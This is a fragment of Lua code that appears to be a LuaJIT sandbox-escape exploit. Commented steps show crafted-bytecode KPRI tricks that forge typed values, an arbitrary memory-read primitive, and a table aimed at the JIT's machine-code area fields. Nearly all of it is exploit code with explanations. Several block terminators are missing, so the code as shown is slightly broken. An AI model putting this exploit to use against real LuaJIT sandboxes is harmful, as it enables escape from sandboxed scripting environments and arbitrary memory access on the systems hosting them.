local iaddr = (inner * 2^1022 * 2^52) % 2^32
-- The following five lines read the "pc" field of the GCfuncL
-- we just obtained. This is done by creating a GCstr object
-- overlaying the GCfuncL, and then pulling some bytes out of
-- the string. Bytecode manipulation results in a nice KPRI
-- instruction which preserves the low 32 bits of the istr
-- TValue while changing the high 32 bits to specify that the
-- low 32 bits contain a GCstr*.
local istr = (iaddr - 4) + 2^52
istr = -32764 -- Turned into KPRI(str)
local pc = s_sub(istr, 5, 8)
istr = resync()
pc = s_uint32(pc)
-- The following three lines result in the local variable
-- called "memory" being `cdata<const char *>: NULL`. We can
-- subsequently use this variable to read arbitrary memory
-- (one byte at a time). Note again the KPRI trick to change
-- the high 32 bits of a TValue. In this case, the low 32 bits
-- end up pointing to the bytecode instructions at the top of
-- this function wrapped in `if false`.
local memory = (pc + 8) + 2^52
memory = -32758 -- Turned into KPRI(cdata)
memory = memory + 0
-- Helper function to read a uint32_t from any memory location.
local function m_uint32(offs)
local result = 0
for i = offs + 3, offs, -1 do
result = result * 256 + (memory[i] % 256)
return result
-- Helper function to extract the low 32 bits of a TValue.
-- In particular, for TValues containing a GCobj*, this gives
-- the GCobj* as a uint32_t. Note that the two memory reads
-- here are GCfuncL::uvptr[1] and GCupval::v.
local vaddr = m_uint32(m_uint32(iaddr + 24) + 16)
local function low32(tv)
v = tv
return m_uint32(vaddr)
-- Helper function which is the inverse of s_uint32: given a
-- 32 bit number, returns a four byte string.
local function ub4(n)
local result = ""
for i = 0, 3 do
local b = n % 256
n = (n - b) / 256
result = result .. s_char(b)
return result
local function hexdump_print(addr, len)
local result = ''
for i = 0, len - 1 do
if i % 16 == 0 and i ~= 0 then
result = result .. '\n'
result = result .. string.format('%02x', memory[addr + i] % 0x100) .. ' '
-- The following four lines result in the local variable
-- called "mctab" containing a very special table: the
-- array part of the table points to the current Lua
-- universe's jit_State::patchins field. Consequently,
-- the table's [0] through [4] fields allow access to the
-- mcprot, mcarea, mctop, mcbot, and szmcarea fields of
-- the jit_State. Note that LuaJIT allocates the empty
-- string within global_State, so a fixed offset from the
-- address of the empty string gives the fields we're
-- after within jit_State.
local mctab_s = "\0\0\0\0\99\4\0\0".. ub4(low32("") + 2748)
local mctab = low32(mctab_s) + 16 + 2^52